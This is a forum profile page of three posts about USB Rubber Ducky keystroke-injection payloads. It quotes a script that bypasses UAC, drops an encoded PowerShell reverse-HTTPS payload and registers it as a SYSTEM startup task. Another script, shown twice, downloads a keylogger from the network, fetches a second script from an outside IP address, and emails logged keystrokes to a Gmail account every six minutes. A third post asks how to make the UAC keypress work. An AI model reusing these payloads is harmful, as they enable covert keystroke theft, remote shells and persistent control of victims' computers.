henna3

Posts posted by henna3

  1. 1 hour ago, Shonenx333 said:

    Hey, I'm done with the batch version of that, but without the check whether the user can actually run cmd as admin without entering a password :(

    
    DELAY 5000
    GUI R
    DELAY 500
    STRING powershell -c start -verb runas cmd
    ENTER
    DELAY 1500
    ALT y
    DELAY 1000
    STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do copy %a\powershell_reverse_https.bat %cd%\ps.bat
    ENTER
    DELAY 500
    STRING schtasks /create /tn "Windows Help Service" /tr %cd%\ps.bat /sc onstart /ru SYSTEM /F
    ENTER
    DELAY 250
    STRING start /min %cd%\ps.bat
    ENTER
    DELAY 200
    STRING exit
    ENTER

    It just copies your generic PowerShell payload found in the Ducky root, named powershell_reverse_https.bat, which looks like this:

    powershell -nop -window hidden -noni -EncodedCommand ...

    to the current working directory, which by default, if cmd is run as admin, is C:\Windows\System32 (or whatever drive letter you have).

    It then adds the PowerShell payload as a scheduled task that runs at startup as the SYSTEM user.

    I also have a binary version of PsExec in C++ which takes much longer to start up from the SD card (up to 6 seconds), but it checks whether the user can even run programs as admin without having to enter the admin password.

    This payload right here should be finished within 6 seconds or something :)

    Have fun

    For some reason the file won't start at startup. I have tested with notepad.exe and another native exe file. Is there a reason for this?

    Thanks

  2. 21 hours ago, Mike Jamieson said:

    First off, I want to thank you for providing educational content to the community. I purchased the USB Rubber Ducky mainly so I can use a keylogger script on it. Unfortunately, I still can't get it to work. I uploaded the mail.ps1 to my server in the public FTP directory; is that the correct directory? See below the IP address of my server, which I changed for security purposes, but it is the same IP number format URL. Finally, I encoded the Ducky script using the ducky decoder and uploaded the inject.bin file to the USB flash drive, then put the microSD into the Duck. I'm really stuck as to what I'm doing wrong here. Below is the mail.ps1 file I'm using as well, in which obviously I changed myemail to my actual email@gmail.com with password.

    DELAY 2000
    GUI r
    DELAY 500
    STRING powershell -WindowStyle hidden
    ENTER
    DELAY 1500
    STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
    ENTER
    DELAY 400
    STRING Get-Keystrokes -LogPath $env:temp\key.txt
    ENTER
    DELAY 200
    GUI r
    DELAY 300
    STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://101.131.71.81/mail.ps1')
    ENTER

    $SMTPServer = 'smtp.gmail.com'
    $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
    $SMTPInfo.EnableSsl = $true
    $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('myemail', 'mypassword')
    $ReportEmail = New-Object System.Net.Mail.MailMessage
    $ReportEmail.From = 'myemail'
    $ReportEmail.To.Add('myemail')
    $ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName
    while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360}

    Any insight would be GREATLY appreciated.

    DELAY 2000
    GUI r
    DELAY 500
    STRING powershell -WindowStyle hidden
    ENTER
    DELAY 1500
    STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
    ENTER
    DELAY 400
    STRING Get-Keystrokes -LogPath $env:temp\key.log
    ENTER
    DELAY 200
    GUI r
    DELAY 300
    STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://101.131.71.81/mail.ps1')
    ENTER

    $SMTPServer = 'smtp.gmail.com'
    $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
    $SMTPInfo.EnableSsl = $true
    $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('myemail', 'mypassword')
    $ReportEmail = New-Object System.Net.Mail.MailMessage
    $ReportEmail.From = 'myemail'
    $ReportEmail.To.Add('myemail')
    $ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName
    while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.log");$SMTPInfo.Send($ReportEmail);sleep 360}

    I have absolutely no idea if this will fix the problem for you, but it worked for me. I simply changed key.txt to key.log.

    Hope it works for you too!

  3. I have a quick little problem. The code and everything runs perfectly fine. My problem is that when the UAC prompt comes up, it comes up as a non-active window. So, when Alt+Y is pressed, it's not being pressed in the UAC prompt window. Is there any way to fix this issue, or a workaround?

    Amazing twin duck payload!

    Thanks.
